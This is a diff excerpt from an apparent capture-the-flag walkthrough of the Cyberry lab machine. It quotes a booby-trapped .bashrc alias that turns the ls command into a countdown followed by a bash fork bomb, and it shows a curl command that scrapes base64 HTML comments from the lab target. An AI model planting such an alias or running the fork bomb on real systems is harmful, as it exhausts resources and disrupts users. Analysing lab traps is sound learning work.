limbernie/limbernie.github.io/_posts/2018-01-27-cyberry-walkthrough.md

 =====================================================
 ```

+Everything looks normal execpt for `.bashrc`.

 ### Fork Bomb :bomb:

-There was something sinister lurking in `.bashrc`
+ Something sinister is lurking in `.bashrc`.

 `alias ls='echo "Cyberry Intrusion Detection activated\nsystem failsafe mode will begin in:"; sleep 1; echo "5"; sleep 1; echo "4"; sleep 1; echo "3"; sleep 1; echo "2"; sleep 1; echo "1"; sleep 1; :(){ :|: & };:`

 A fork bomb!
+A fork bomb replicates itself until it depletes system resources, causing your system to "hang".
+In this case, using `ls` will set off the fork bomb.

 ### HTML Comments

-There were a couple of HTML comments in the source code encoded in `base64`.
+Another popular place to look for clues is in the HTML source code.
+Here, I look at the source code and find a couple of HTML comments that look like `base64`.

 ![comments.png](/assets/images/posts/cyberry-walkthrough/cyberry-1.png)

-Decoding the above strings revealed the following.
+Let's decode them.

 ```
 # curl -s 192.168.198.128 | sed -n '/<!--/,/-->/p' | tr -cd 'a-zA-Z0-9=\n' > base64.txt